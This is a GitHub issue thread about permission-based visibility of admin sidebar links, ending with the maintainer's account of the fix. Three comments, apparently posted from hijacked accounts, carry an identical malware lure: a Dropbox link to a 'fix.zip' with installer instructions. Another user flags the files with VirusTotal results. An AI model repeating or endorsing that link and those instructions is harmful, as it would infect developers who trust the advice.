### ISSUE TITLE
Admin Sidebar Permissions

### ISSUE THREAD

**Issue by mtiluk** [michaeltukdev/AetherBilling#6]
The shorthand has already been passed in so you can just call 'hasPermission()' inside of the React component.

- Needs to hide and show navigation links based on the permissions of the user
- Goes with dropdowns too as some users will be able to create users and others wont, if the nav link it exists it should be checked.
- Make permissions optional so you don't have to always pass them in.

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by BowuDev** [comment]
@NimaJafariComp please check your notifications. 😨 
> - https://www.virustotal.com/gui/file/799b27cba62b236ac145572ae493c8c222871aa62f540a2c54a303a896ee6328
> - https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a
> - https://www.virustotal.com/gui/file/3e6587a54953714ca433ba384139f03c30827c5f90a054fb10d5cd2f79f25f4b

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
> @NimaJafariComp please check your notifications. 😨
> 
> > * https://www.virustotal.com/gui/file/799b27cba62b236ac145572ae493c8c222871aa62f540a2c54a303a896ee6328
> > * https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a
> > * https://www.virustotal.com/gui/file/3e6587a54953714ca433ba384139f03c30827c5f90a054fb10d5cd2f79f25f4b

Account have been getting hacked aince morning, these comments arent mine, i had 2fa too, github database mustve leaked

**Comment by mtiluk** [comment]
Thanks to Bowu for catching and investigating what happened last night in this issue, much love <3.

This issue is now solved.
- Made it so you can pass an optional array into 'hasPermissions' as before it was singular.
- You can still pass in a single permission without an array
- Filtered the navigation items before doing the loop, simplifies the structure
